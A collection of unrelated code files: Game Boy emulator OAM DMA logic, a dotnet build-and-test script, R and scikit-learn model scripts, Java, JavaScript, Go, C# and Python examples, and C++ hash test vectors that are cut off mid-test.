    //      (gambatte) oamdma/oamdma_src0000_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
    //      (gambatte) oamdma/oamdma_src0000_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
    //      (gambatte) oamdma/oamdma_srcA000_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
    //      (gambatte) oamdma/oamdma_srcA000_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
    //      (gambatte) oamdma/oamdma_srcBF00_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
    //      (gambatte) oamdma/oamdma_srcBF00_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
    //      (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
    //      (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
    //      (gambatte) oamdma/oamdma_srcE000_busypushC001_dmg08_out45221234_cgb04c_outFFAA1255
    //      (gambatte) oamdma/oamdma_srcE000_busypushE001_dmg08_out45221234_cgb04c_outFFFFAA55
    //
    if (m_device.cgb_mode() && (address >= 0xC000))
    {
        if (!is_work_ram_dma_source(m_oam_dma_src_address))
        {
            // bit 4 of the DMA register selects the work ram bank window
            int work_ram_offset  = (m_oam_dma_reg & 0x10) ? 0xD000 : 0xC000;
            int work_ram_address = work_ram_offset + (address & 0xFFF);
            m_memory.write_byte(work_ram_address, value);
            msg << "\n    * CGB: will write [" << log_hex16(work_ram_address) << "] = " << log_hex8(value) << " instead";
            return true;
        }
        // When work ram is used as OAM DMA source,
        // writing to work ram during DMA has no effect:
        //      (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
        //      (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
        //      (gambatte) oamdma/oamdma_srcDF00_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
        //      (gambatte) oamdma/oamdma_srcDF00_busypushE001_dmg08_out45221234_cgb04c_out65761234
        //
        msg << "\n    * CGB: work ram write ignored, won't affect OAM DMA from work ram";
        return true;
    }
    // the value ends up in OAM instead of the addressed location
    m_override_next_oam_byte = value;
    // CGB:
    // OAM DMA VRAM conflicts will write zero to the OAM:
    //      (gambatte) oamdma/oamdma_src8000_busypush8001_dmg08_out55761234_cgb04c_out00761234
    //      (gambatte) oamdma/oamdma_src8000_busypushA001_dmg08_out65AA1255_cgb04c_out65001255
    //      (gambatte) oamdma/oamdma_src9F00_busypush8001_dmg08_out55761234_cgb04c_out00761234
    //      (gambatte) oamdma/oamdma_src9F00_busypushA001_dmg08_out65AA1255_cgb04c_out65001255
    //
    if (m_device.cgb_mode())
    {
        if (is_video_ram(address))
        {
            m_override_next_oam_byte = 0;
            msg << "\n    * CGB: replacing " << log_hex8(value)
                << " with " << log_hex8(m_override_next_oam_byte) << " (OAM DMA from VRAM)";
        }
    }
    // DMG:
    // any writes during OAM DMA transfer from work ram will mix up existing
    // OAM data and the data to be written:
    //      (gambatte) oamdma/oamdma_srcC000_busypush0001_dmg08_out4576AA34_cgb04c_out6576AA34
    //      (gambatte) oamdma/oamdma_srcC000_busypush8001_dmg08_out65221255_cgb04c_out65761255
    //      (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
    //      (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
    //! \todo DMG: mixing OAM data & work ram writes: we should probably examine this further
    //
    else
    {
        if ((m_oam_dma_src_address >= 0xC000) && (m_oam_dma_src_address < 0xFE00))
        {
            // the "mix" is a bitwise AND of the DMA byte and the written value
            m_override_next_oam_byte = m_next_oam_byte & value;
            msg << "\n    * DMG: replacing " << log_hex8(value)
                << " with " << log_hex8(m_override_next_oam_byte)
                << " (mixing OAM data when writing to work ram)";
        }
    }
    // log write conflict
    msg << "\n    * will write " << log_hex8(m_override_next_oam_byte) << " to OAM next"
        << "\n    * will NOT write [" << log_hex16(address) << "] = " << log_hex8(value);
    return true;
}
void age::gb_oam_dma::set_back_clock(int clock_cycle_offset)
{
    // Rebase the cached "last OAM DMA cycle" timestamp when the global
    // clock is set back — presumably to keep the cycle counter from
    // overflowing over long sessions (confirm against gb_set_back_clock_cycle).
    gb_set_back_clock_cycle(m_oam_dma_last_cycle, clock_cycle_offset);
}
void age::gb_oam_dma::write_dma_reg(uint8_t value)
{
    // Store the raw register value and schedule the actual OAM DMA start.
    //
    // Reading the DMA register will always return the last value
    // written to it even if no OAM DMA was triggered.
    //
    // (mooneye-gb) acceptance/oam_dma/reg_read
    //
    m_oam_dma_reg = value;
    // DMG: OAM DMA starts after the next M-cycle
    //
    // (mooneye-gb) acceptance/oam_dma_start
    //
    int clk_start = m_clock.get_machine_cycle_clocks() * 2;
    m_events.schedule_event(gb_event::start_oam_dma, clk_start);
    // If a transfer is already running, the newly scheduled start event
    // will terminate it (see log message below).
    log() << "write DMA = " << log_hex8(value)
          << ", OAM DMA will start on clock cycle " << (m_clock.get_clock_cycle() + clk_start)
          << (m_oam_dma_active ? " and terminate the current OAM DMA" : "");
}
void age::gb_oam_dma::handle_start_dma_event()
{
    // Begin a new OAM DMA transfer: reset progress and derive the
    // effective source address from the last DMA register write.
    m_oam_dma_last_cycle = m_clock.get_clock_cycle();
    m_oam_dma_active     = true;
    m_oam_dma_offset     = 0;
    // Trying to trigger an OAM DMA transfer from a memory address
    // greater than 0xDFFF will instead trigger an OAM DMA transfer
    // for the corresponding 0xC000-0xDFFF memory range.
    //
    // (mooneye-gb) acceptance/oam_dma/sources-dmgABCmgbS
    //
    // CGB: triggering an OAM DMA transfer from a memory address
    // greater than 0xDFFF will set OAM data to 0xFF.
    //
    // (gambatte) oamdma/oamdma_srcE000_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
    // (gambatte) oamdma/oamdma_srcE000_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
    // (gambatte) oamdma/oamdma_srcEF00_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
    // (gambatte) oamdma/oamdma_srcEF00_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
    // (gambatte) oamdma/oamdma_srcF000_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
    // (gambatte) oamdma/oamdma_srcF000_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
    // (gambatte) oamdma/oamdma_srcFE00_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
    // (gambatte) oamdma/oamdma_srcFE00_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
    //
    // DMG: the mask below mirrors source pages > 0xDF back into the
    // 0xC000-0xDFFF range; CGB keeps the raw (possibly invalid) address,
    // which read_dma_byte() then resolves to 0xFF.
    m_oam_dma_src_address = m_device.is_cgb_device()
                                ? m_oam_dma_reg * 0x100
                                : (m_oam_dma_reg * 0x100) & ((m_oam_dma_reg > 0xDF) ? 0xDF00 : 0xFF00);
    log() << "starting OAM DMA, reading from " << log_hex16(m_oam_dma_src_address);
}
void age::gb_oam_dma::continue_dma()
{
    // Catch up on an active OAM DMA transfer: copy one byte per elapsed
    // machine cycle since the last update, up to OAM's 160 bytes.
    if (!m_oam_dma_active)
    {
        return;
    }
    int current_clk    = m_clock.get_clock_cycle();
    int cycles_elapsed = current_clk - m_oam_dma_last_cycle;
    // round down to whole machine cycles (machine cycle length is a power of two)
    cycles_elapsed &= ~(m_clock.get_machine_cycle_clocks() - 1);
    m_oam_dma_last_cycle += cycles_elapsed;
    // normalize to single-speed clock cycles (4 per machine cycle)
    cycles_elapsed <<= m_clock.is_double_speed() ? 1 : 0;
    AGE_ASSERT((cycles_elapsed & 3) == 0)
    int bytes = std::min(cycles_elapsed / 4, 160 - m_oam_dma_offset);
    for (int i = m_oam_dma_offset, max = m_oam_dma_offset + bytes; i < max; ++i)
    {
        uint8_t byte = read_dma_byte(i);
        //! \todo apparently oam dma is not blocked by mode 2 and 3, is there any test rom for this?
        // (see e.g. Zelda on DMG: sprites bugs when blocking oam writes here)
        m_lcd.write_oam_dma(i, byte);
        // clear any pending CPU write conflict once it has been consumed
        m_override_next_oam_byte = -1;
        auto msg = log();
        msg << "write OAM [" << log_hex16(0xFE00 + i) << "] = " << log_hex8(byte);
        if (m_oam_dma_src_address >= 0xE000)
        {
            msg << " (CGB: OAM DMA source >= 0xE000 invalid)";
        }
        else
        {
            uint16_t address = m_oam_dma_src_address + i;
            msg << " == [" << log_hex16(address) << "]";
        }
    }
    m_oam_dma_offset += bytes;
    AGE_ASSERT(m_oam_dma_offset <= 160)
    if (m_oam_dma_offset >= 160)
    {
        // all 160 OAM bytes transferred
        m_oam_dma_active     = false;
        m_oam_dma_last_cycle = gb_no_clock_cycle;
        log() << "OAM DMA finished";
    }
    else
    {
        // prefetch the next byte so write conflicts can mix with it
        m_next_oam_byte = read_dma_byte(m_oam_dma_offset);
    }
}
age::uint8_t age::gb_oam_dma::read_dma_byte(int offset) const
{
    // A pending conflicting CPU write (>= 0) overrides the transferred byte.
    if (m_override_next_oam_byte >= 0)
    {
        return m_override_next_oam_byte;
    }
    // Regular case: read straight from the DMA source.
    if (m_oam_dma_src_address < 0xE000)
    {
        return m_memory.read_byte(m_oam_dma_src_address + offset);
    }
    // Source addresses >= 0xE000 are only kept on CGB devices
    // (handle_start_dma_event masks them on DMG) and read as 0xFF.
    AGE_ASSERT(m_device.is_cgb_device())
    return 0xFF;
}
|
#!/usr/bin/env bash
# Bootstrap the dotnet CLI, restore packages and run the core unit tests.
# Usage: script.sh [-c|--clear-cache]
while true ; do
    case "$1" in
        -c|--clear-cache) CLEAR_CACHE=1 ; shift ;;
        --) shift ; break ;;
        *) shift ; break ;;
    esac
done
RESULTCODE=0
# Download the CLI install script to cli
echo "Installing dotnet CLI"
mkdir -p cli
curl -o cli/dotnet-install.sh https://raw.githubusercontent.com/dotnet/cli/master/scripts/obtain/dotnet-install.sh
# Run install.sh for cli
chmod +x cli/dotnet-install.sh
# v1 needed for some test
cli/dotnet-install.sh -i cli -c 1.0
# todo: update to read version from build.props https://github.com/NuGet/Home/issues/7485
cli/dotnet-install.sh -i cli -c release/2.2.1xx
# Display current version
DOTNET_TEST="$(pwd)/cli_test/dotnet"
DOTNET="$(pwd)/cli/dotnet"
$DOTNET --version
echo "================="
# init the repo
git submodule init
git submodule update
# clear caches
if [ "$CLEAR_CACHE" == "1" ]
then
    # echo "Clearing the nuget web cache folder"
    # rm -r -f ~/.local/share/NuGet/*
    echo "Clearing the nuget packages folder"
    rm -r -f ~/.nuget/packages/*
fi
# restore packages
# NOTE: the echoed command must match the command actually executed below
# (it previously announced /t:RestoreTests while running /t:Restore).
echo "$DOTNET msbuild build/build.proj /t:Restore /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta"
$DOTNET msbuild build/build.proj /t:Restore /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta
if [ $? -ne 0 ]; then
    echo "Restore failed!!"
    exit 1
fi
# run tests
echo "$DOTNET msbuild build/build.proj /t:CoreUnitTests /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta"
$DOTNET msbuild build/build.proj /t:CoreUnitTests /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta
if [ $? -ne 0 ]; then
    echo "Tests failed!!"
    exit 1
fi
exit $RESULTCODE
|
# Import libraries
library(tidyverse)
library(caret)
# Load the dataset
df <- read.csv('mall_visitors.csv')
# Split into train and test sets (75/25), reproducibly
set.seed(123)
train_index <- createDataPartition(df$visitors_sunday, p = 0.75, list = FALSE)
train_set <- df[train_index, ]
test_set <- df[-train_index, ]
# Fit a linear regression model
set.seed(123)
model_fit <- train(visitors_sunday ~ ., data = train_set, method = 'lm')
# Make predictions on the held-out data
test_pred <- predict(model_fit, newdata = test_set)
# Performance metrics: visitors_sunday is a numeric target fitted with
# method = 'lm', i.e. a REGRESSION problem. confusionMatrix() only applies
# to classification and fails on numeric predictions, so report regression
# metrics (RMSE / R-squared / MAE) with postResample() instead.
postResample(pred = test_pred, obs = test_set$visitors_sunday)
package uk.gov.companieshouse.ocrapiconsumer.request;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.is;
import static org.mockito.Mockito.when;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.client.RestTemplate;
import uk.gov.companieshouse.ocrapiconsumer.groups.Unit;
@Unit
@ExtendWith(MockitoExtension.class)
class ImageRestClientTest extends TestParent {
    @Mock
    private RestTemplate restTemplate;
    @InjectMocks
    private ImageRestClient imageRestClient;
    /**
     * Happy path: the image endpoint responds 200 OK with TIFF bytes and the
     * client returns them unchanged. Note that {@code expected} and the
     * stubbed response body are the same array reference, so the
     * {@code is(...)} matcher succeeds via reference equality.
     */
    @Test
    void testGetTiffImageSuccessfully() {
        // given
        byte[] expected = MOCK_TIFF_CONTENT;
        when(restTemplate.getForEntity(IMAGE_ENDPOINT, byte[].class))
                .thenReturn(new ResponseEntity<>(MOCK_TIFF_CONTENT, HttpStatus.OK));
        // when
        byte[] actual = imageRestClient.getImageContentsFromEndpoint(CONTEXT_ID, IMAGE_ENDPOINT);
        // then
        assertThat(actual, is(expected));
    }
}
|
<filename>src/com/ibm/nmon/gui/table/IntegerCellRenderer.java
package com.ibm.nmon.gui.table;
import javax.swing.table.DefaultTableCellRenderer;
import java.awt.Component;
import java.text.DecimalFormat;
import javax.swing.JTable;
/**
* Renders integer data with thousands separator.
*/
public final class IntegerCellRenderer extends DefaultTableCellRenderer {
private static final long serialVersionUID = 1867029028990000830L;
private static final DecimalFormat FORMAT = new DecimalFormat("#,##0");
public IntegerCellRenderer() {
super();
}
@Override
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus,
int row, int column) {
super.getTableCellRendererComponent(table, null, isSelected, hasFocus, row, column);
setHorizontalAlignment(TRAILING);
setValue(FORMAT.format(value));
return this;
}
}
|
const { flatten } = require("mongo-dot-notation");
const Card = require("../db/models/Card");
const { checkRequestData } = require("../helpers/functions/Express");
const { sendError, generateError } = require("../helpers/functions/Error");
// Thin pass-through wrappers around the Card mongoose model's query helpers.
exports.find = (search, projection, options = {}) => Card.find(search, projection, options);
exports.aggregate = aggregation => Card.aggregate(aggregation);
exports.findOne = (search, projection, options = {}) => Card.findOne(search, projection, options);
exports.fillCategories = data => {
const subCategoriesMetadata = {
"technology": { mainCategory: "object" },
"clothes": { mainCategory: "object" },
"movie": { mainCategory: "art" },
"tv-series": { mainCategory: "art" },
"video-game": { mainCategory: "art" },
"painting": { mainCategory: "art" },
"theatre-play": { mainCategory: "art" },
"sculpture": { mainCategory: "art" },
"architecture": { mainCategory: "art" },
"music": { mainCategory: "art" },
"animal": { mainCategory: "nature" },
"sport": { mainCategory: "activity" },
"job": { mainCategory: "activity" },
};
data.categories = data.categories.reduce((acc, category) => {
const subCategoryMetadata = subCategoriesMetadata[category];
if (subCategoryMetadata && !acc.includes(subCategoryMetadata.mainCategory)) {
acc.push(subCategoryMetadata.mainCategory);
}
return acc;
}, data.categories);
};
exports.checkAndFillDataBeforeCreate = data => this.fillCategories(data);
// Creates one card (or several when `data` is an array).
// `options.toJSON`: when truthy, the result is serialized with toJSON().
exports.create = async(data, options = {}) => {
    await this.checkAndFillDataBeforeCreate(data);
    const { toJSON } = options;
    delete options.toJSON;
    // NOTE(review): mongoose Model.create only accepts an options argument
    // for array input; remaining options are dropped for a single document —
    // confirm this is intended.
    if (!Array.isArray(data)) {
        options = null;
    }
    const card = await Card.create(data, options);
    return toJSON ? card.toJSON() : card;
};
// Pre-update hook: rejects updates on missing cards and keeps main
// categories in sync when the categories field is being changed.
exports.checkAndFillDataBeforeUpdate = (data, existingCard) => {
    if (!existingCard) {
        throw generateError("CARD_NOT_FOUND", `Card not found.`);
    }
    if (data.categories) {
        this.fillCategories(data);
    }
};
// Updates the first card matching `search` with `data` (dot-notation
// flattened for partial updates). `options.new` defaults to true, i.e. the
// UPDATED document is returned. `options.toJSON` serializes the result.
exports.findOneAndUpdate = async(search, data, options = {}) => {
    const { toJSON } = options;
    delete options.toJSON;
    options.new = options.new === undefined ? true : options.new;
    const existingCard = await this.findOne(search);
    await this.checkAndFillDataBeforeUpdate(data, existingCard);
    const updatedCard = await Card.findOneAndUpdate(search, flatten(data), options);
    return toJSON ? updatedCard.toJSON() : updatedCard;
};
// Deletes the first card matching `search` and returns the deleted
// document; throws CARD_NOT_FOUND when nothing matches.
exports.findOneAndDelete = async search => {
    const card = await this.findOne(search);
    if (!card) {
        throw generateError("CARD_NOT_FOUND", `Card not found.`);
    }
    await Card.deleteOne(search);
    return card;
};
exports.getFindSearch = query => {
const searchFieldsFromQuery = ["label", "categories", "difficulty"];
const search = {};
for (const field in query) {
if (searchFieldsFromQuery.includes(field)) {
search[field] = query[field];
}
}
return search;
};
exports.getFindProjection = query => query.fields ? query.fields.split(",") : null;
// Builds mongoose query options (limit/sort) from the request query string.
// NOTE(review): when "sort-by"/"order" are absent this yields
// { undefined: undefined } as the sort spec — verify mongoose tolerates it.
exports.getFindOptions = options => ({
    limit: options.limit,
    sort: { [options["sort-by"]]: options.order },
});
// GET /cards — lists cards filtered/projected/sorted by query parameters.
exports.getCards = async(req, res) => {
    try {
        const { query } = checkRequestData(req);
        const findSearch = this.getFindSearch(query);
        const findProjection = this.getFindProjection(query);
        const findOptions = this.getFindOptions(query);
        const cards = await this.find(findSearch, findProjection, findOptions);
        return res.status(200).json(cards);
    } catch (e) {
        sendError(res, e);
    }
};
// GET /cards/:id — fetches a single card; 404-style error when missing.
exports.getCard = async(req, res) => {
    try {
        const { params } = checkRequestData(req);
        const card = await this.findOne({ _id: params.id });
        if (!card) {
            throw generateError("CARD_NOT_FOUND", `Card not found with ID "${params.id}".`);
        }
        return res.status(200).json(card);
    } catch (e) {
        sendError(res, e);
    }
};
// POST /cards — creates a card from the request body.
exports.postCard = async(req, res) => {
    try {
        const { body } = checkRequestData(req);
        const card = await this.create(body);
        return res.status(200).json(card);
    } catch (e) {
        sendError(res, e);
    }
};
// PATCH /cards/:id — partially updates a card; returns the updated document.
exports.patchCard = async(req, res) => {
    try {
        const { body, params } = checkRequestData(req);
        const card = await this.findOneAndUpdate({ _id: params.id }, body);
        return res.status(200).json(card);
    } catch (e) {
        sendError(res, e);
    }
};
// DELETE /cards/:id — deletes a card; returns the deleted document.
exports.deleteCard = async(req, res) => {
    try {
        const { params } = checkRequestData(req);
        const card = await this.findOneAndDelete({ _id: params.id });
        return res.status(200).json(card);
    } catch (e) {
        sendError(res, e);
    }
};
<reponame>LaudateCorpus1/swinch<gh_stars>10-100
/*
Copyright 2021 Adobe. All rights reserved.
This file is licensed to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a copy
of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
OF ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
*/
package spincli
import (
"fmt"
log "github.com/sirupsen/logrus"
"swinch/cmd/config"
)
// ApplicationAPI drives Spinnaker application commands through the spin CLI.
type ApplicationAPI struct {
	// appName is the application the current command targets.
	appName string
	// Embedded CLI helper — presumably supplies executeAppCmd/rmTmp
	// (defined outside this view; confirm).
	SpinCLI
}

// baseArgs are appended to every spin CLI invocation: disable color and
// point the CLI at swinch's own spin config file.
var baseArgs = []string{
	"--no-color=false",
	"--config", config.HomeFolder() + config.CfgFolderName + config.CfgSpinFileName,
}
// NotFound is the sentinel error for a missing application. The exact
// message matters: status() dispatches by comparing error strings, so do
// not reword it without updating the comparison sites.
func (a *ApplicationAPI) NotFound() error {
	return fmt.Errorf("Application '%v' not found\n", a.appName)
}

// deleteNotFound is the sentinel error for deleting a non-existent
// application; same string-matching caveat as NotFound.
func (a *ApplicationAPI) deleteNotFound() error {
	return fmt.Errorf("attempting to delete application '%v' which does not exist, exiting", a.appName)
}
// Get fetches the named application via `spin application get` and returns
// the raw CLI output bytes. Errors are logged through status().
func (a *ApplicationAPI) Get(appName string) []byte {
	a.appName = appName
	args := []string{"application", "get", a.appName}
	buffer, err := a.executeAppCmd(append(baseArgs, args...))
	a.status(err)
	return buffer.Bytes()
}
// Save creates or updates the application from the manifest at filePath
// via `spin application save`, then removes the (temporary) manifest file.
func (a ApplicationAPI) Save(appName, filePath string) {
	a.appName = appName
	// Register cleanup up front so the temp manifest is removed even if
	// the command below fails or panics (previously the defer was only
	// registered at the very end of the function).
	defer a.rmTmp(filePath)
	args := []string{"application", "save", "--file", filePath}
	_, err := a.executeAppCmd(append(baseArgs, args...))
	a.status(err)
	if err == nil {
		log.Infof("Application '%v' updated successfully", a.appName)
	}
}
// Delete removes the named application via `spin application delete`,
// logging success or routing the error through status().
func (a ApplicationAPI) Delete(appName string) {
	a.appName = appName
	args := []string{"application", "delete", a.appName}
	_, err := a.executeAppCmd(append(baseArgs, args...))
	if err != nil {
		a.status(err)
	} else {
		log.Infof("Delete application '%v' success", a.appName)
	}
}
// status triages a CLI error: the two well-known "not found" cases are
// logged at info level, anything else is fatal. NOTE: dispatch relies on
// exact error-string equality with NotFound()/deleteNotFound().
func (a *ApplicationAPI) status(err error) {
	if err != nil {
		switch err.Error() {
		case a.NotFound().Error():
			log.Info(a.NotFound())
		case a.deleteNotFound().Error():
			log.Info(a.deleteNotFound())
		default:
			log.Fatalf("Failed to check application status: %v", err)
		}
	}
}
|
<filename>Aulas/Aula 31/MeuPrimeiroProgama.java
package co.joaoemanuel;
import java.lang.reflect.Array;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
/**
 * ArrayList demo: basic add/get/search/size operations on a list of names.
 */
public class MeuPrimeiroProgama {
    public static void main(String[] args) {
        List<String> names = new ArrayList<>();
        // Adding elements to the list
        names.add("Nome 1");
        names.add("Nome 2");
        names.add("Nome 3");
        names.add("Nome 4");
        // Fetching a specific element by index with get()
        for (byte i = 0; i < names.size(); i++) {
            System.out.println(names.get(i));
        }
        // Finding the index of a given element
        System.out.println(names.indexOf("Nome 2"));
        // Checking whether the list is empty
        System.out.println(names.isEmpty());
        // Checking whether the list contains a given element
        System.out.println(names.contains("Nome 4"));
        // List size
        System.out.println(names.size());
        // clear() removes every element; it returns void
        names.clear();
    }

    /** Prints a single line of text. */
    public static void print(String text) {
        System.out.println(text);
    }

    /** Prints the CONTENTS of the array. */
    public static void printi(int[] num) {
        // Printing the array directly would emit its reference
        // (e.g. "[I@1b6d3586"), not its elements — use Arrays.toString.
        System.out.println(Arrays.toString(num));
    }
}
#!/usr/bin/python3
'''
o assert serve para validar se o retorno é verdadeiro
caso contrário gerará uma execao
classe='success' = é um parametro opcional
Se nao for passado o valor padrao sera sucesso
'''
def tag_bloco(texto, classe='success'):
    """Return *texto* wrapped in an HTML div tagged with CSS class *classe*.

    *classe* is optional and defaults to ``'success'``.
    """
    return '<div class="{}">{}</div>'.format(classe, texto)
if __name__ == '__main__':
    # Tests (assertions): assert raises AssertionError when the
    # comparison below is false.
    assert tag_bloco('Incluído com sucesso!') == \
        '<div class="success">Incluído com sucesso!</div>'
    assert tag_bloco('Impossível excluir!', 'error') == \
        '<div class="error">Impossível excluir!</div>'
    print(tag_bloco('bloco'))  # calling the function
# Sources:
# Curso Python 3 - Curso Completo do Básico ao Avançado Udemy Aula 115
# https://github.com/cod3rcursos/curso-python/tree/master/funcoes
|
"""
Classify reviews of a product as either positive or negative using a supervised machine learning model
"""
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
# Read the dataset
df = pd.read_csv('data/reviews.csv')
# Extract the features and target
X = df['text']
y = df['label']
# Vectorize the features
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(X)
# Split data into train and test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train the model
clf = MultinomialNB()
clf.fit(X_train, y_train)
# Evaluate the model
accuracy = clf.score(X_test, y_test)
# Print the accuracy
print("Accuracy: {}".format(accuracy)) |
pip install cupy pynvrtc git+https://github.com/salesforce/pytorch-qrnn
|
/// <summary>Prints the first n Fibonacci numbers on a single line.</summary>
public class Fibonacci
{
    public static void Main(string[] args)
    {
        int n = 10;
        // Console is fully qualified because this file contains no
        // `using System;` directive — unqualified `Console` would not compile.
        System.Console.WriteLine("Fibonacci Numbers up to {0} are : ", n);
        int a = 0, b = 1, c = 0;
        System.Console.Write("{0} {1}", a, b); // seed values 0 and 1
        for (int i = 2; i < n; ++i) // starts at 2: 0 and 1 are already printed
        {
            c = a + b;
            System.Console.Write(" {0}", c);
            a = b;
            b = c;
        }
    }
}
#include <boost/test/unit_test.hpp>
#include <algorithm>
#include <deque>
#include <iostream>
#include <iterator>
#include <list>
#include <sstream>
#include <vector>
#include <koinos/bigint.hpp>
#include <koinos/util/conversion.hpp>
#include <koinos/crypto/elliptic.hpp>
#include <koinos/crypto/multihash.hpp>
#include <koinos/crypto/merkle_tree.hpp>
#include <koinos/common.pb.h>
#include <koinos/tests/crypto_fixture.hpp>
using namespace koinos::crypto;
BOOST_FIXTURE_TEST_SUITE( crypto_tests, crypto_fixture )
// Known-answer tests: each digest below is the published test vector for
// the respective algorithm over the fixture inputs TEST1..TEST5 (plus a
// large input via test_big).
BOOST_AUTO_TEST_CASE( ripemd160_test )
{
    test( multicodec::ripemd_160, TEST1, "8eb208f7e05d987a9b044a8e98c6b087f15a0bfc" );
    test( multicodec::ripemd_160, TEST2, "9c1185a5c5e9fc54612808977ee8f548b2258d31" );
    test( multicodec::ripemd_160, TEST3, "12a053384a9c0c88e405a06c27dcf49ada62eb2b" );
    test( multicodec::ripemd_160, TEST4, "6f3fa39b6b503c384f919a49a7aa5c2c08bdfb45" );
    test( multicodec::ripemd_160, TEST5, "52783243c1697bdbe16d37f97f68f08325dc1528" );
    test_big( multicodec::ripemd_160, "29b6df855772aa9a95442bf83b282b495f9f6541" );
}
BOOST_AUTO_TEST_CASE( sha1_test )
{
    test( multicodec::sha1, TEST1, "a9993e364706816aba3e25717850c26c9cd0d89d" );
    test( multicodec::sha1, TEST2, "da39a3ee5e6b4b0d3255bfef95601890afd80709" );
    test( multicodec::sha1, TEST3, "84983e441c3bd26ebaae4aa1f95129e5e54670f1" );
    test( multicodec::sha1, TEST4, "a49b2446a02c645bf419f995b67091253a04a259" );
    test( multicodec::sha1, TEST5, "34aa973cd4c4daa4f61eeb2bdbad27316534016f" );
    test_big( multicodec::sha1, "7789f0c9ef7bfc40d93311143dfbe69e2017f592" );
}
BOOST_AUTO_TEST_CASE( sha256_test )
{
    test( multicodec::sha2_256, TEST1, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" );
    test( multicodec::sha2_256, TEST2, "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" );
    test( multicodec::sha2_256, TEST3, "248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1" );
    test( multicodec::sha2_256, TEST4, "cf5b16a778af8380036ce59e7b0492370b249b11e8f07a51afac45037afee9d1" );
    test( multicodec::sha2_256, TEST5, "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0" );
    test_big( multicodec::sha2_256, "50e72a0e26442fe2552dc3938ac58658228c0cbfb1d2ca872ae435266fcd055e" );
}
BOOST_AUTO_TEST_CASE( sha512_test )
{
    test( multicodec::sha2_512, TEST1, "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a"
                                       "2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f" );
    test( multicodec::sha2_512, TEST2, "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
                                       "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" );
    test( multicodec::sha2_512, TEST3, "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c335"
                                       "96fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" );
    test( multicodec::sha2_512, TEST4, "8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa17299aeadb6889018"
                                       "501d289e4900f7e4331b99dec4b5433ac7d329eeb6dd26545e96e55b874be909" );
    test( multicodec::sha2_512, TEST5, "e718483d0ce769644e2e42c7bc15b4638e1f98b13b2044285632a803afa973eb"
                                       "de0ff244877ea60a4cb0432ce577c31beb009c5c2c49aa2e4eadb217ad8cc09b" );
    test_big( multicodec::sha2_512, "b47c933421ea2db149ad6e10fce6c7f93d0752380180ffd7f4629a712134831d"
                                    "77be6091b819ed352c2967a2e2d4fa5050723c9630691f1a05a7281dbe6c1086" );
}
// Round-trips 100 key pairs derived from an evolving passphrase:
// sign a digest with the private key and check public-key recovery.
// NOTE(review): "<PASSWORD>" looks like a redacted placeholder from a
// dataset scrub — any non-empty seed string works for this test.
BOOST_AUTO_TEST_CASE( ecc )
{
    private_key nullkey;
    std::string pass = "<PASSWORD>";
    for( uint32_t i = 0; i < 100; ++ i )
    {
        multihash h = hash( multicodec::sha2_256, pass.c_str(), pass.size() );
